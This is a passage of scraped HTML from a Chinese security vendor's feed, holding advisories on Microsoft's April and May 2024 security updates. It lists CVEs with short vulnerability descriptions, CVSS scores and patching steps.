1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30009：Windows路由和远程访问服务(RRAS)远程代码执行漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows路由和远程访问服务(RRAS)中的数字截断错误（CWE-197）。远程攻击者通过诱骗目标用户使用客户端连接到攻击者控制的恶意服务器，然后将恶意数据包发送给客户端来利用此漏洞，这可能允许攻击者在目标用户客户端上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-30010：Windows Hyper-V远程代码执行漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">该漏洞是Windows Hyper-V中的相对路径遍历漏洞（CWE-23）。经过身份认证的远程攻击者通过从远程计算机向目标主机上的Hyper-V副本端点发送格式错误的数据包来利用此漏洞。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-30017：Windows Hyper-V远程代码执行漏洞</span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞是Windows Hyper-V中的堆溢出漏洞（CWE-122）。来宾虚拟机上经过身份认证的攻击者通过向虚拟机上的硬件资源发送特制的文件操作请求来利用此漏洞，成功利用此漏洞，可能会导致在主机服务器上执行任意代码。</span><span style="font-size: 14px;letter-spacing: 0.034em;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的05月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-May" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-May</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section><section powered-by="xiumi.us"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496631">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=936869b1&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496631%26idx%3D1%26sn%3D4607ecebf7ad7cb3470c8ec652863261%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 15 May 2024 15:06:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年04月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496629&amp;idx=1&amp;sn=5596cc45149b977bc8a8242218d030c7</link>
      <description>2024年04月10日，天融信阿尔法实验室监测到微软官方发布了04月安全更新。此次更新共修复149个漏洞（不包含3个外部分配漏洞和本月早些时候发布的3个Edge漏洞），其中3个严重漏洞、142个重要漏洞、3个中危漏洞、1个低危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-04-10 15:22</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年04月10日，天融信阿尔法实验室监测到微软官方发布了04月安全更新。此次更新共修复149个漏洞（不包含3个外部分配漏洞和本月早些时候发布的3个Edge漏洞），其中3个严重漏洞、142个重要漏洞、3个中危漏洞、1个低危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年04月10日，天融信阿尔法实验室监测到微软官方发布了04月安全更新。此次更新共修复149个漏洞（不包含3个外部分配漏洞和本月早些时候发布的3个Edge漏洞），其中3个严重漏洞(Critical)、142个重要漏洞(Important)、3个中危漏洞(Moderate)、1个低危漏洞(Low)。其中权限提升漏洞31个、远程代码执行漏洞68个、信息泄露漏洞12个、拒绝服务漏洞7个、欺骗漏洞5个、安全功能绕过漏洞26个。</span><span style="font-size: 14px;letter-spacing: 0.476px;color: rgb(0, 0, 0);"></span></p><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="color: black;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Proxy Driver、Microsoft Install Service、Windows Local Security Authority Subsystem Service (LSASS)、Windows Remote Access Connection Manager、Windows DHCP Server、Windows Kernel、Windows Win32K、Windows Compressed Folder、Windows Secure Boot、Windows Authentication Methods、Internet Shortcut Files、SQL Server等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="color: black;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，CVE-2024-26234已发现在野利用，且被公开披露。CVE-2024-29988由Google TAG报告给微软，且有报道称其已被在野利用，但微软未承认其已被在野利用。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26234：Proxy驱动欺骗漏洞</span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞CVSS3.1评分为6.7/6.2。已发现在野利用，且被公开披露。通过滥用Microsoft Windows硬件兼容性计划(WHCP)签名，经过身份认证的攻击者利用签名的后门可被Windows视为合法白文件执行。</span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26158</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft安装服务本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26209</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft本地安全认证子系统服务(LSASS)信息泄露漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">5.5/4.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26211</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows远程访问连接管理器本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26212</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">DHCP Server服务拒绝服务漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.5/6.5</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26218</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Kernel本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26230</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Telephony Server本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26239</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Telephony Server本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26241</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26256</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">libarchive远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-28903</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Secure Boot安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">6.7/5.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-28921</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Secure Boot安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: 